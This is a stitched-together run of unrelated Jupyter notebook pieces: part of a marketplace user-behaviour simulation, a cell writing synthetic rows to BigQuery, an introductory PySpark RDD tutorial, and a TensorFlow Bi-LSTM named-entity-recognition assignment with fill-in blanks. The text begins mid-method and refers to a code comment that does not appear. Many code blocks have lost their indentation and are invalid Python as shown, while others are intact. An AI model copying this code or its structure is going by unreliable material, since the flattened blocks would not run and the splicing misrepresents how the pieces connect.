self.basket.remove(item_id)
print(self.last_event, timestamp)
def pay(self, timestamp):
"""User pays for item / set of items.
Parameters:
item_id: id of the item user views.
timestamp: time of the event.
"""
self.last_event = 'pay'
self.last_activity = timestamp
for item_id in self.basket:
# update item attributes
items[item_id].status = 'sold'
items[item_id].buyer = self.user_id
items[item_id].date_sold = timestamp
# update lister's attributes
lister_id = items[item_id].lister_id
users[lister_id].active_items.remove(item_id)
if hasattr(users[lister_id], 'sold_items'):
users[lister_id].sold_items.append(item_id)
else:
users[lister_id].sold_items = [item_id]
# update buyer's attributes
if hasattr(self, 'purchased_items'):
self.purchased_items.extend(self.basket)
else:
self.purchased_items = self.basket
# empty basket
self.basket = []
print(self.last_event, timestamp)
def delete_items(self, item_id, timestamp):
"""User removes an item.
Parameters:
item_id: id of the item user views.
timestamp: time of the event.
"""
self.last_event = 'delete_items'
self.last_activity = timestamp
self.active_items.remove(item_id)
items[item_id].status = 'deleted'
items[item_id].date_deleted = timestamp
if hasattr(self, 'deleted_items'):
self.deleted_items.append(item_id)
else:
self.deleted_items = [item_id]
def do_nothing(self, timestamp):
self.active_session = False
def session(user_id, timestamp):
if user_id not in users.keys():
users[user_id] = User(name=str(user_id), user_id=user_id)
users[user_id].visit(timestamp=timestamp, platform='ios', country='DE')
# number of the event
n = 0
while users[user_id].active_session:
last_event = users[user_id].last_event
next_events = events[last_event]['next_events'].copy()
probabilities = events[last_event]['probabilities'].copy()
# adjust registration probability
if users[user_id].registered == False and 'create_account' not in next_events:
# add registration as potential event
next_events.append('create_account')
probabilities = [prob * 0.8 for prob in probabilities]
probabilities.append(0.2)
# adjust open basket probability
if users[user_id].n_items_in_basket > 0 and users[user_id].last_event != 'open_basket' and 'open_basket' not in next_events:
next_events.append('open_basket')
probabilities = [prob * 0.8 for prob in probabilities]
probabilities.append(0.2)
# adjust read_message probability
if users[user_id].n_unread_messages > 0:
# add read_message as potential event
next_events.append('read_message')
probabilities = [prob * 0.2 for prob in probabilities]
probabilities.append(0.8)
# adjust listing probability
if 'list_item' in next_events:
index = next_events.index('list_item')
probabilities[index] = probabilities[index] * users[user_id].listing_index
# with every event probability of do nothing grows
if 'do_nothing' in next_events:
index = next_events.index('do_nothing')
probabilities[index] = probabilities[index] * (1 + n/100)
# check condition for every event
for event in next_events:
if 'conditions' in events[event]:
for condition in events[event]['conditions']:
if eval(f'users[user_id].{condition}') == False:
index = next_events.index(event)
next_events.remove(event)
probabilities.pop(index)
break
# normalize probabilities
total_p = sum(probabilities)
probabilities = [p/total_p for p in probabilities]
probabilities[0] = probabilities[0] + 1-sum(probabilities)
rand = np.random.default_rng(seed=timestamp.minute*60+timestamp.second+user_id)
next_event = rand.choice(a=next_events, p=probabilities)
time_delta = int(rand.integers(low=events[last_event]['time'][0], high=events[last_event]['time'][1]))
timestamp = timestamp + timedelta(seconds=time_delta)
eval(f'users[user_id].{next_event}(timestamp=timestamp)')
n += 1
# create initial set of items
users[1] = User(name='first user', user_id=1)
start_date = datetime.now() - timedelta(days=10)
users[1].create_account(timestamp=start_date)
for i in range(100):
users[1].list_item(timestamp=start_date + timedelta(seconds=i+1) + timedelta(minutes=i+1))
# create events for the first users
for i in range(2,101):
print('\nUSER: {}'.format(i))
users[i] = User(name='{} user'.format(i), user_id=i)
session(user_id=i, timestamp=start_date + timedelta(minutes=300+i) + timedelta(seconds=i))
for user_id in users.keys():
if user_id != 1:
print(f'user_id: {user_id}, satisfaction: {users[user_id].satisfaction}, visit probability: {users[user_id].visit_probability}')
users[31].registered
```
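The comment at the top of the cell suggests drawing event times from a distribution instead of a uniform random choice. A minimal sketch with exponentially distributed inter-event gaps (the 60-second mean is an assumption, not a value from the simulation):

```python
import numpy as np
from datetime import datetime, timedelta

rng = np.random.default_rng(seed=42)

# exponential inter-event gaps with a hypothetical mean of 60 seconds
gaps = rng.exponential(scale=60, size=5)

timestamp = datetime(2021, 4, 18, 23, 10, 11)
for gap in gaps:
    timestamp += timedelta(seconds=float(gap))
    print(timestamp)
```

Unlike a uniform draw from `[low, high]`, the exponential distribution produces many short gaps and occasional long ones, which is closer to real user behavior.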
## Writing data to bigquery
```
from google.cloud import storage
from google.cloud import bigquery
import sys
import os
bigquery_client = bigquery.Client.from_service_account_json('../../credentials/data-analysis-sql-309220-6ce084250abd.json')
countries = ['UK', 'DE', 'AT']
countries_probs = [0.5, 0.4, 0.1]
agents = ['android', 'ios', 'web']
agents_probs = [0.4, 0.3, 0.3]
rand = np.random.default_rng(seed=1)
objects = []
for i in range(1000):
    timestamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
    row = {  # renamed from `object` to avoid shadowing the builtin
        'timestamp': timestamp,
        'id': str(hash(timestamp)),
        'nested': {
            'os': rand.choice(a=agents, p=agents_probs),
            'country': rand.choice(a=countries, p=countries_probs)
        }
    }
    objects.append(row)
    time.sleep(0.01)
bq_error = bigquery_client.insert_rows_json('data-analysis-sql-309220.synthetic.nested_test', objects)
if bq_error != []:
    print(bq_error)
```
# Introduction to Spark and Python
Let's learn how to use Spark with Python by using the pyspark library! Make sure to view the video lecture explaining Spark and RDDs before continuing on with this code.
This notebook will serve as reference code for the Big Data section of the course involving Amazon Web Services. The video will provide fuller explanations for what the code is doing.
## Creating a SparkContext
First we need to create a SparkContext. We will import this from pyspark:
```
from pyspark import SparkContext
```
Now create the SparkContext. A SparkContext represents the connection to a Spark cluster, and can be used to create RDDs and broadcast variables on that cluster.
*Note! You can only have one SparkContext at a time the way we are running things here.*
```
sc = SparkContext()
```
## Basic Operations
We're going to start with a 'hello world' example, which is just reading a text file. First let's create a text file.
___
Let's write an example text file to read, we'll use some special jupyter notebook commands for this, but feel free to use any .txt file:
```
%%writefile example.txt
first line
second line
third line
fourth line
```
### Creating the RDD
Now we can take in the textfile using the **textFile** method off of the SparkContext we created. This method will read a text file from HDFS, a local file system (available on all
nodes), or any Hadoop-supported file system URI, and return it as an RDD of Strings.
```
textFile = sc.textFile('example.txt')
```
Spark’s primary abstraction is a distributed collection of items called a Resilient Distributed Dataset (RDD). RDDs can be created from Hadoop InputFormats (such as HDFS files) or by transforming other RDDs.
### Actions
We have just created an RDD using the textFile method and can perform operations on this object, such as counting the rows.
RDDs have actions, which return values, and transformations, which return pointers to new RDDs. Let’s start with a few actions:
```
textFile.count()
textFile.first()
```
### Transformations
Now we can use transformations; for example, the filter transformation returns a new RDD containing a subset of the items in the file. Let's create a sample transformation using the filter() method. This method (just like Python's own filter function) returns only the elements that satisfy the condition. Let's look for lines that contain the word 'second' — there should be exactly one such line.
```
secfind = textFile.filter(lambda line: 'second' in line)
# RDD
secfind
# Perform action on transformation
secfind.collect()
# Perform action on transformation
secfind.count()
```
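For comparison, here is the same predicate with Python's own filter, which the text likens to the RDD transformation — the Spark version simply distributes this logic across partitions and defers it until an action runs:

```python
lines = ['first line', 'second line', 'third line', 'fourth line']

# same predicate as the RDD filter above, applied eagerly in plain Python
matches = list(filter(lambda line: 'second' in line, lines))
print(matches)      # ['second line']
print(len(matches)) # 1
```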
Notice how the transformations won't display an output and won't be run until an action is called. In the next lecture: Advanced Spark and Python we will begin to see many more examples of this transformation and action relationship!
# Great Job!
# Recognize named entities on Twitter with LSTMs
In this assignment, you will use a recurrent neural network to solve the Named Entity Recognition (NER) problem. NER is a common task in natural language processing systems. It serves for extracting entities such as persons, organizations, and locations from text. In this task you will experiment with recognizing named entities in tweets.
For example, say we want to extract persons' and organizations' names from the text. Then, for the input text:
Ian Goodfellow works for Google Brain
a NER model needs to provide the following sequence of tags:
B-PER I-PER O O B-ORG I-ORG
Where the *B-* and *I-* prefixes stand for the beginning and the inside of the entity, while *O* means the token is outside any entity. Markup with this prefix scheme is called *BIO markup*, and it is introduced to distinguish between consecutive entities of the same type.
A solution of the task will be based on neural networks, particularly, on Bi-Directional Long Short-Term Memory Networks (Bi-LSTMs).
### Libraries
For this task you will need the following libraries:
- [Tensorflow](https://www.tensorflow.org) — an open-source software library for Machine Intelligence.
In this assignment, we use Tensorflow 1.15.0. You can install it with pip:
!pip install tensorflow==1.15.0
- [Numpy](http://www.numpy.org) — a package for scientific computing.
If you have never worked with Tensorflow, you would probably need to read some tutorials during your work on this assignment, e.g. [this one](https://www.tensorflow.org/tutorials/recurrent) could be a good starting point.
### Data
The following cell will download all data required for this assignment into the folder `week2/data`.
```
try:
import google.colab
IN_COLAB = True
except:
IN_COLAB = False
if IN_COLAB:
! wget https://raw.githubusercontent.com/hse-aml/natural-language-processing/master/setup_google_colab.py -O setup_google_colab.py
import setup_google_colab
setup_google_colab.setup_week2()
import sys
sys.path.append("..")
from common.download_utils import download_week2_resources
download_week2_resources()
```
### Load the Twitter Named Entity Recognition corpus
We will work with a corpus, which contains tweets with NE tags. Every line of a file contains a pair of a token (word/punctuation symbol) and a tag, separated by a whitespace. Different tweets are separated by an empty line.
The function *read_data* reads a corpus from *file_path* and returns two lists: one with tokens and one with the corresponding tags. You need to complete this function by adding code that replaces each user's nickname with a `<USR>` token and each URL with a `<URL>` token. You can assume that a URL is simply a string that starts with *http://* or *https://*, and a nickname is a string that starts with the *@* symbol.
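As a standalone sketch of the replacement rule (deliberately kept outside the graded read_data function; the helper name is ours):

```python
def normalize_token(token):
    # URLs start with http:// or https://; nicknames start with '@'
    if token.startswith('http://') or token.startswith('https://'):
        return '<URL>'
    if token.startswith('@'):
        return '<USR>'
    return token

print(normalize_token('@alice'))          # <USR>
print(normalize_token('https://t.co/x'))  # <URL>
print(normalize_token('hello'))           # hello
```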
```
def read_data(file_path):
    tokens = []
    tags = []
    tweet_tokens = []
    tweet_tags = []
    for line in open(file_path, encoding='utf-8'):
        line = line.strip()
        if not line:
            if tweet_tokens:
                tokens.append(tweet_tokens)
                tags.append(tweet_tags)
            tweet_tokens = []
            tweet_tags = []
        else:
            token, tag = line.split()
            # Replace all urls with <URL> token
            # Replace all users with <USR> token
            ######################################
            ######### YOUR CODE HERE #############
            ######################################
            tweet_tokens.append(token)
            tweet_tags.append(tag)
    return tokens, tags
```
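One possible way to fill in the replacement step is to check each token's prefix before appending it. This is only a sketch; the helper name `normalize_token` is ours, not part of the assignment template:

```python
def normalize_token(token):
    """Replace URLs with <URL> and user mentions with <USR>.

    One possible implementation of the replacement step above;
    the helper name is ours, not part of the assignment template.
    """
    if token.startswith('http://') or token.startswith('https://'):
        return '<URL>'
    if token.startswith('@'):
        return '<USR>'
    return token

print(normalize_token('@jack'))             # <USR>
print(normalize_token('https://t.co/abc'))  # <URL>
print(normalize_token('hello'))             # hello
```

Inside *read_data*, you would then call `token = normalize_token(token)` right before appending to `tweet_tokens`.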
And now we can load three separate parts of the dataset:
- *train* data for training the model;
- *validation* data for evaluation and hyperparameters tuning;
- *test* data for final evaluation of the model.
```
train_tokens, train_tags = read_data('data/train.txt')
validation_tokens, validation_tags = read_data('data/validation.txt')
test_tokens, test_tags = read_data('data/test.txt')
```
You should always understand what kind of data you deal with. For this purpose, you can print the data running the following cell:
```
for i in range(3):
for token, tag in zip(train_tokens[i], train_tags[i]):
print('%s\t%s' % (token, tag))
print()
```
### Prepare dictionaries
To train a neural network, we will use two mappings:
- {token}$\to${token id}: address the row in embeddings matrix for the current token;
- {tag}$\to${tag id}: one-hot ground truth probability distribution vectors for computing the loss at the output of the network.
Now you need to implement the function *build_dict* which will return {token or tag}$\to${index} and vice versa.
```
from collections import defaultdict
def build_dict(tokens_or_tags, special_tokens):
"""
tokens_or_tags: a list of lists of tokens or tags
special_tokens: some special tokens
"""
# Create a dictionary with default value 0
tok2idx = defaultdict(lambda: 0)
idx2tok = []
# Create mappings from tokens (or tags) to indices and vice versa.
# At first, add special tokens (or tags) to the dictionaries.
# The first special token must have index 0.
# Mapping tok2idx should contain each token or tag only once.
# To do so, you should:
    # 1. extract the unique tokens/tags from the tokens_or_tags variable that do not
    #    occur in special_tokens (the two sets could have a non-empty intersection);
    # 2. index them (for example, by appending them to the list idx2tok);
    # 3. for each token/tag, save its index into tok2idx.
######################################
######### YOUR CODE HERE #############
######################################
return tok2idx, idx2tok
```
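A sketch of how *build_dict* could be completed, following the numbered comments above: the special tokens are indexed first (so the first one gets index 0), then every not-yet-seen token in order of appearance. This is one valid implementation, not the only one:

```python
from collections import defaultdict

def build_dict(tokens_or_tags, special_tokens):
    """Build a {token: index} mapping and an [index -> token] list."""
    tok2idx = defaultdict(lambda: 0)  # unknown tokens fall back to index 0 (<UNK>)
    idx2tok = []
    # Special tokens first, so the first special token gets index 0.
    for token in special_tokens:
        tok2idx[token] = len(idx2tok)
        idx2tok.append(token)
    # Then every token not already indexed (the data may repeat special tokens).
    for token_list in tokens_or_tags:
        for token in token_list:
            if token not in tok2idx:
                tok2idx[token] = len(idx2tok)
                idx2tok.append(token)
    return tok2idx, idx2tok

tok2idx, idx2tok = build_dict([['hi', '<UNK>', 'hi', 'there']], ['<UNK>', '<PAD>'])
print(idx2tok)  # ['<UNK>', '<PAD>', 'hi', 'there']
```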
After implementing the function *build_dict* you can make dictionaries for tokens and tags. Special tokens in our case will be:
- `<UNK>` token for out of vocabulary tokens;
- `<PAD>` token for padding sentence to the same length when we create batches of sentences.
```
special_tokens = ['<UNK>', '<PAD>']
special_tags = ['O']
# Create dictionaries
token2idx, idx2token = build_dict(train_tokens + validation_tokens, special_tokens)
tag2idx, idx2tag = build_dict(train_tags, special_tags)
```
The next additional functions will help you to create the mapping between tokens and ids for a sentence.
```
def words2idxs(tokens_list):
return [token2idx[word] for word in tokens_list]
def tags2idxs(tags_list):
return [tag2idx[tag] for tag in tags_list]
def idxs2words(idxs):
return [idx2token[idx] for idx in idxs]
def idxs2tags(idxs):
return [idx2tag[idx] for idx in idxs]
```
### Generate batches
Neural networks are usually trained with batches, meaning that each weight update of the network is based on several sequences at once. The tricky part is that all sequences within a batch need to have the same length, so we will pad them with a special `<PAD>` token. It is also good practice to provide the RNN with sequence lengths, so it can skip computations for the padded parts. We provide the batching function *batches_generator* ready-made for you to save time.
```
def batches_generator(batch_size, tokens, tags,
shuffle=True, allow_smaller_last_batch=True):
"""Generates padded batches of tokens and tags."""
n_samples = len(tokens)
if shuffle:
order = np.random.permutation(n_samples)
else:
order = np.arange(n_samples)
n_batches = n_samples // batch_size
if allow_smaller_last_batch and n_samples % batch_size:
n_batches += 1
for k in range(n_batches):
batch_start = k * batch_size
batch_end = min((k + 1) * batch_size, n_samples)
current_batch_size = batch_end - batch_start
x_list = []
y_list = []
max_len_token = 0
for idx in order[batch_start: batch_end]:
x_list.append(words2idxs(tokens[idx]))
y_list.append(tags2idxs(tags[idx]))
max_len_token = max(max_len_token, len(tags[idx]))
# Fill in the data into numpy nd-arrays filled with padding indices.
x = np.ones([current_batch_size, max_len_token], dtype=np.int32) * token2idx['<PAD>']
y = np.ones([current_batch_size, max_len_token], dtype=np.int32) * tag2idx['O']
lengths = np.zeros(current_batch_size, dtype=np.int32)
for n in range(current_batch_size):
utt_len = len(x_list[n])
x[n, :utt_len] = x_list[n]
lengths[n] = utt_len
y[n, :utt_len] = y_list[n]
yield x, y, lengths
```
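The padding logic inside *batches_generator* can be illustrated in isolation with NumPy. The token indices below are made up for the example, and `1` plays the role of the `<PAD>` index:

```python
import numpy as np

# Two token-index sequences of different lengths (hypothetical indices).
x_list = [[5, 7, 2], [3, 9]]
PAD = 1
max_len = max(len(seq) for seq in x_list)

# Pre-fill with the padding index, then overwrite the real tokens.
x = np.ones((len(x_list), max_len), dtype=np.int32) * PAD
lengths = np.zeros(len(x_list), dtype=np.int32)
for n, seq in enumerate(x_list):
    x[n, :len(seq)] = seq
    lengths[n] = len(seq)

print(x)        # [[5 7 2]
                #  [3 9 1]]
print(lengths)  # [3 2]
```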
## Build a recurrent neural network
This is the most important part of the assignment. Here we will specify the network architecture based on TensorFlow building blocks — it's as fun and easy as building with Lego! We will create an LSTM network that produces a probability distribution over tags for each token in a sentence. To take into account both the right and left contexts of a token, we will use a Bi-Directional LSTM (Bi-LSTM). A dense layer on top will perform the tag classification.
```
import tensorflow as tf
import numpy as np
class BiLSTMModel():
pass
```
First, we need to create [placeholders](https://www.tensorflow.org/api_docs/python/tf/compat/v1/placeholder) to specify what data we are going to feed into the network during the execution time. For this task we will need the following placeholders:
- *input_batch* — sequences of words (the shape equals to [batch_size, sequence_len]);
- *ground_truth_tags* — sequences of tags (the shape equals to [batch_size, sequence_len]);
- *lengths* — lengths of not padded sequences (the shape equals to [batch_size]);
- *dropout_ph* — dropout keep probability; this placeholder has a predefined value 1;
- *learning_rate_ph* — learning rate; we need this placeholder because we want to change the value during training.
Note that we use *None* in the declared shapes, which means that data of any size can be fed.
You need to complete the function *declare_placeholders*.
```
def declare_placeholders(self):
"""Specifies placeholders for the model."""
# Placeholders for input and ground truth output.
self.input_batch = tf.placeholder(dtype=tf.int32, shape=[None, None], name='input_batch')
self.ground_truth_tags = ######### YOUR CODE HERE #############
# Placeholder for lengths of the sequences.
self.lengths = tf.placeholder(dtype=tf.int32, shape=[None], name='lengths')
# Placeholder for a dropout keep probability. If we don't feed
# a value for this placeholder, it will be equal to 1.0.
self.dropout_ph = tf.placeholder_with_default(tf.cast(1.0, tf.float32), shape=[])
# Placeholder for a learning rate (tf.float32).
self.learning_rate_ph = ######### YOUR CODE HERE #############
BiLSTMModel.__declare_placeholders = classmethod(declare_placeholders)
```
Now, let us specify the layers of the neural network. First, we need to perform some preparatory steps:
- Create embeddings matrix with [tf.Variable](https://www.tensorflow.org/api_docs/python/tf/Variable). Specify its name (*embeddings_matrix*), type (*tf.float32*), and initialize with random values.
- Create forward and backward LSTM cells. TensorFlow provides a number of RNN cells ready for you. We suggest that you use *LSTMCell*, but you can also experiment with other types, e.g. GRU cells. [This](http://colah.github.io/posts/2015-08-Understanding-LSTMs/) blogpost could be interesting if you want to learn more about the differences.
- Wrap your cells with [DropoutWrapper](https://www.tensorflow.org/api_docs/python/tf/contrib/rnn/DropoutWrapper). Dropout is an important regularization technique for neural networks. Specify all keep probabilities using the dropout placeholder that we created before.
After that, you can build the computation graph that transforms an input_batch:
- [Look up](https://www.tensorflow.org/api_docs/python/tf/nn/embedding_lookup) embeddings for an *input_batch* in the prepared *embedding_matrix*.
- Pass the embeddings through [Bidirectional Dynamic RNN](https://www.tensorflow.org/api_docs/python/tf/nn/bidirectional_dynamic_rnn) with the specified forward and backward cells. Use the lengths placeholder here to avoid computations for padding tokens inside the RNN.
- Create a dense layer on top. Its output will be used directly in the loss function.
Fill in the code below. In case you need to debug something, the easiest way is to check that tensor shapes of each step match the expected ones.
```
def build_layers(self, vocabulary_size, embedding_dim, n_hidden_rnn, n_tags):
"""Specifies bi-LSTM architecture and computes logits for inputs."""
# Create embedding variable (tf.Variable) with dtype tf.float32
initial_embedding_matrix = np.random.randn(vocabulary_size, embedding_dim) / np.sqrt(embedding_dim)
embedding_matrix_variable = ######### YOUR CODE HERE #############
# Create RNN cells (for example, tf.nn.rnn_cell.BasicLSTMCell) with n_hidden_rnn number of units
# and dropout (tf.nn.rnn_cell.DropoutWrapper), initializing all *_keep_prob with dropout placeholder.
forward_cell = ######### YOUR CODE HERE #############
backward_cell = ######### YOUR CODE HERE #############
# Look up embeddings for self.input_batch (tf.nn.embedding_lookup).
# Shape: [batch_size, sequence_len, embedding_dim].
embeddings = ######### YOUR CODE HERE #############
# Pass them through Bidirectional Dynamic RNN (tf.nn.bidirectional_dynamic_rnn).
# Shape: [batch_size, sequence_len, 2 * n_hidden_rnn].
# Also don't forget to initialize sequence_length as self.lengths and dtype as tf.float32.
(rnn_output_fw, rnn_output_bw), _ = ######### YOUR CODE HERE #############
rnn_output = tf.concat([rnn_output_fw, rnn_output_bw], axis=2)
# Dense layer on top.
# Shape: [batch_size, sequence_len, n_tags].
self.logits = tf.layers.dense(rnn_output, n_tags, activation=None)
BiLSTMModel.__build_layers = classmethod(build_layers)
```
To compute the actual predictions of the neural network, you need to apply [softmax](https://www.tensorflow.org/api_docs/python/tf/nn/softmax) to the last layer and find the most probable tags with [argmax](https://www.tensorflow.org/api_docs/python/tf/argmax).
```
def compute_predictions(self):
"""Transforms logits to probabilities and finds the most probable tags."""
# Create softmax (tf.nn.softmax) function
softmax_output = ######### YOUR CODE HERE #############
# Use argmax (tf.argmax) to get the most probable tags
# Don't forget to set axis=-1
# otherwise argmax will be calculated in a wrong way
self.predictions = ######### YOUR CODE HERE #############
BiLSTMModel.__compute_predictions = classmethod(compute_predictions)
```
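The softmax-then-argmax combination can be checked with a small NumPy sketch; the TF code you write should behave the same way along the last axis:

```python
import numpy as np

def softmax(logits, axis=-1):
    # Subtract the max for numerical stability before exponentiating.
    shifted = logits - logits.max(axis=axis, keepdims=True)
    exp = np.exp(shifted)
    return exp / exp.sum(axis=axis, keepdims=True)

logits = np.array([[[2.0, 0.5, 0.1],
                    [0.2, 3.0, 0.3]]])   # shape: [batch, seq_len, n_tags]
probs = softmax(logits)
predictions = probs.argmax(axis=-1)      # most probable tag per token
print(predictions)  # [[0 1]]
```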
During training we do not need predictions of the network, but we need a loss function. We will use [cross-entropy loss](http://ml-cheatsheet.readthedocs.io/en/latest/loss_functions.html#cross-entropy), efficiently implemented in TF as
[cross entropy with logits](https://www.tensorflow.org/api_docs/python/tf/nn/softmax_cross_entropy_with_logits_v2). Note that it should be applied to logits of the model (not to softmax probabilities!). Also note, that we do not want to take into account loss terms coming from `<PAD>` tokens. So we need to mask them out, before computing [mean](https://www.tensorflow.org/api_docs/python/tf/reduce_mean).
```
def compute_loss(self, n_tags, PAD_index):
"""Computes masked cross-entopy loss with logits."""
# Create cross entropy function function (tf.nn.softmax_cross_entropy_with_logits_v2)
ground_truth_tags_one_hot = tf.one_hot(self.ground_truth_tags, n_tags)
loss_tensor = ######### YOUR CODE HERE #############
mask = tf.cast(tf.not_equal(self.input_batch, PAD_index), tf.float32)
# Create loss function which doesn't operate with <PAD> tokens (tf.reduce_mean)
# Be careful that the argument of tf.reduce_mean should be
# multiplication of mask and loss_tensor.
self.loss = ######### YOUR CODE HERE #############
BiLSTMModel.__compute_loss = classmethod(compute_loss)
```
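The effect of the mask can be seen with plain NumPy (toy numbers): per-token losses at `<PAD>` positions are zeroed out before averaging, mirroring the `tf.reduce_mean` of the mask-times-loss tensor in the cell above:

```python
import numpy as np

PAD_index = 1
input_batch = np.array([[5, 7, 1],          # last position is padding
                        [3, 9, 4]])
loss_tensor = np.array([[0.2, 0.4, 9.9],    # large bogus loss at the PAD slot
                        [0.1, 0.3, 0.5]])

# Zero out loss terms that come from <PAD> tokens, then take the mean.
mask = (input_batch != PAD_index).astype(np.float32)
masked_loss = (mask * loss_tensor).mean()
print(round(float(masked_loss), 3))  # 0.25 — the 9.9 at the PAD slot is ignored
```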
The last thing to specify is how we want to optimize the loss.
We suggest that you use [Adam](https://www.tensorflow.org/api_docs/python/tf/train/AdamOptimizer) optimizer with a learning rate from the corresponding placeholder.
You will also need to apply clipping to eliminate exploding gradients. It can be easily done with [clip_by_norm](https://www.tensorflow.org/api_docs/python/tf/clip_by_norm) function.
```
def perform_optimization(self):
"""Specifies the optimizer and train_op for the model."""
# Create an optimizer (tf.train.AdamOptimizer)
self.optimizer = ######### YOUR CODE HERE #############
self.grads_and_vars = self.optimizer.compute_gradients(self.loss)
# Gradient clipping (tf.clip_by_norm) for self.grads_and_vars
# Pay attention that you need to apply this operation only for gradients
# because self.grads_and_vars also contains variables.
# list comprehension might be useful in this case.
clip_norm = tf.cast(1.0, tf.float32)
self.grads_and_vars = ######### YOUR CODE HERE #############
self.train_op = self.optimizer.apply_gradients(self.grads_and_vars)
BiLSTMModel.__perform_optimization = classmethod(perform_optimization)
```
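What `tf.clip_by_norm` does to each gradient tensor can be reproduced with NumPy: a tensor whose L2 norm exceeds `clip_norm` is rescaled to exactly that norm, and smaller tensors pass through unchanged. This is a sketch of the semantics, not the TF implementation:

```python
import numpy as np

def clip_by_norm(t, clip_norm):
    """Rescale t so its L2 norm is at most clip_norm."""
    norm = np.sqrt((t ** 2).sum())
    if norm > clip_norm:
        return t * (clip_norm / norm)
    return t

g = np.array([3.0, 4.0])                        # L2 norm 5.0
clipped = clip_by_norm(g, 1.0)
print(clipped)                                  # [0.6 0.8] -> norm 1.0
print(clip_by_norm(np.array([0.3, 0.4]), 1.0))  # unchanged, norm 0.5
```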
Congratulations! You have specified all the parts of your network. You may have noticed that we haven't dealt with any real data yet, so what you have written so far is just a recipe for how the network should function.
Now we will put these pieces into the constructor of our Bi-LSTM class, to use it in the next section.
```
def init_model(self, vocabulary_size, n_tags, embedding_dim, n_hidden_rnn, PAD_index):
self.__declare_placeholders()
self.__build_layers(vocabulary_size, embedding_dim, n_hidden_rnn, n_tags)
self.__compute_predictions()
self.__compute_loss(n_tags, PAD_index)
self.__perform_optimization()
BiLSTMModel.__init__ = classmethod(init_model)
```
## Train the network and predict tags
[Session.run](https://www.tensorflow.org/api_docs/python/tf/Session#run) is the point that initiates computations in the graph we have defined. To train the network, we need to compute *self.train_op*, which was declared in *perform_optimization*. To predict tags, we just need to compute *self.predictions*. In both cases, we need to feed actual data through the placeholders that we defined before.
```
def train_on_batch(self, session, x_batch, y_batch, lengths, learning_rate, dropout_keep_probability):
feed_dict = {self.input_batch: x_batch,
self.ground_truth_tags: y_batch,
self.learning_rate_ph: learning_rate,
self.dropout_ph: dropout_keep_probability,
self.lengths: lengths}
session.run(self.train_op, feed_dict=feed_dict)
BiLSTMModel.train_on_batch = classmethod(train_on_batch)
```
Implement the function *predict_for_batch* by initializing *feed_dict* with input *x_batch* and *lengths* and running the *session* for *self.predictions*.
```
def predict_for_batch(self, session, x_batch, lengths):
######################################
######### YOUR CODE HERE #############
######################################
return predictions
BiLSTMModel.predict_for_batch = classmethod(predict_for_batch)
```
We have finished the necessary methods of our BiLSTMModel and are almost ready to start experimenting.
### Evaluation
To simplify the evaluation process we provide two functions for you:
- *predict_tags*: uses a model to get predictions and transforms indices to tokens and tags;
- *eval_conll*: calculates precision, recall and F1 for the results.
```
from evaluation import precision_recall_f1
def predict_tags(model, session, token_idxs_batch, lengths):
"""Performs predictions and transforms indices to tokens and tags."""
tag_idxs_batch = model.predict_for_batch(session, token_idxs_batch, lengths)
tags_batch, tokens_batch = [], []
for tag_idxs, token_idxs in zip(tag_idxs_batch, token_idxs_batch):
tags, tokens = [], []
for tag_idx, token_idx in zip(tag_idxs, token_idxs):
tags.append(idx2tag[tag_idx])
tokens.append(idx2token[token_idx])
tags_batch.append(tags)
tokens_batch.append(tokens)
return tags_batch, tokens_batch
def eval_conll(model, session, tokens, tags, short_report=True):
"""Computes NER quality measures using CONLL shared task script."""
y_true, y_pred = [], []
for x_batch, y_batch, lengths in batches_generator(1, tokens, tags):
tags_batch, tokens_batch = predict_tags(model, session, x_batch, lengths)
if len(x_batch[0]) != len(tags_batch[0]):
raise Exception("Incorrect length of prediction for the input, "
"expected length: %i, got: %i" % (len(x_batch[0]), len(tags_batch[0])))
predicted_tags = []
ground_truth_tags = []
for gt_tag_idx, pred_tag, token in zip(y_batch[0], tags_batch[0], tokens_batch[0]):
if token != '<PAD>':
ground_truth_tags.append(idx2tag[gt_tag_idx])
predicted_tags.append(pred_tag)
# We extend every prediction and ground truth sequence with 'O' tag
# to indicate a possible end of entity.
y_true.extend(ground_truth_tags + ['O'])
y_pred.extend(predicted_tags + ['O'])
results = precision_recall_f1(y_true, y_pred, print_results=True, short_report=short_report)
return results
```
## Run your experiment
Create *BiLSTMModel* model with the following parameters:
- *vocabulary_size* — number of tokens;
- *n_tags* — number of tags;
- *embedding_dim* — dimension of embeddings, recommended value: 200;
- *n_hidden_rnn* — size of hidden layers for RNN, recommended value: 200;
- *PAD_index* — an index of the padding token (`<PAD>`).
Set hyperparameters. You might want to start with the following recommended values:
- *batch_size*: 32;
- 4 epochs;
- starting value of *learning_rate*: 0.005
- *learning_rate_decay*: a square root of 2;
- *dropout_keep_probability*: try several values: 0.1, 0.5, 0.9.
However, feel free to conduct more experiments to tune hyperparameters and earn extra points for the assignment.
```
tf.reset_default_graph()
model = ######### YOUR CODE HERE #############
batch_size = ######### YOUR CODE HERE #############
n_epochs = ######### YOUR CODE HERE #############
learning_rate = ######### YOUR CODE HERE #############
learning_rate_decay = ######### YOUR CODE HERE #############
dropout_keep_probability = ######### YOUR CODE HERE #############
```
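One possible starting configuration, taken directly from the recommended values above. The commented-out model line is only a sketch of the call shape and assumes the dictionaries defined earlier in the notebook:

```python
# Recommended starting values from the list above (tune them for extra points).
batch_size = 32
n_epochs = 4
learning_rate = 0.005
learning_rate_decay = 2 ** 0.5   # square root of 2
dropout_keep_probability = 0.5   # also try 0.1 and 0.9

# The model itself would be created along these lines (requires the TF graph
# and the token2idx / tag2idx dictionaries built earlier):
# model = BiLSTMModel(vocabulary_size=len(token2idx), n_tags=len(tag2idx),
#                     embedding_dim=200, n_hidden_rnn=200,
#                     PAD_index=token2idx['<PAD>'])
```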
If you get the error *"Tensor conversion requested dtype float64 for Tensor with dtype float32"* at this point, check whether any variables were initialised without an explicit dtype, and set dtype to *tf.float32* for them.
Finally, we are ready to run the training!
```
sess = tf.Session()
sess.run(tf.global_variables_initializer())
print('Start training... \n')
for epoch in range(n_epochs):
# For each epoch evaluate the model on train and validation data
print('-' * 20 + ' Epoch {} '.format(epoch+1) + 'of {} '.format(n_epochs) + '-' * 20)
print('Train data evaluation:')
eval_conll(model, sess, train_tokens, train_tags, short_report=True)
print('Validation data evaluation:')
eval_conll(model, sess, validation_tokens, validation_tags, short_report=True)
# Train the model
for x_batch, y_batch, lengths in batches_generator(batch_size, train_tokens, train_tags):
model.train_on_batch(sess, x_batch, y_batch, lengths, learning_rate, dropout_keep_probability)
# Decaying the learning rate
learning_rate = learning_rate / learning_rate_decay
print('...training finished.')
```
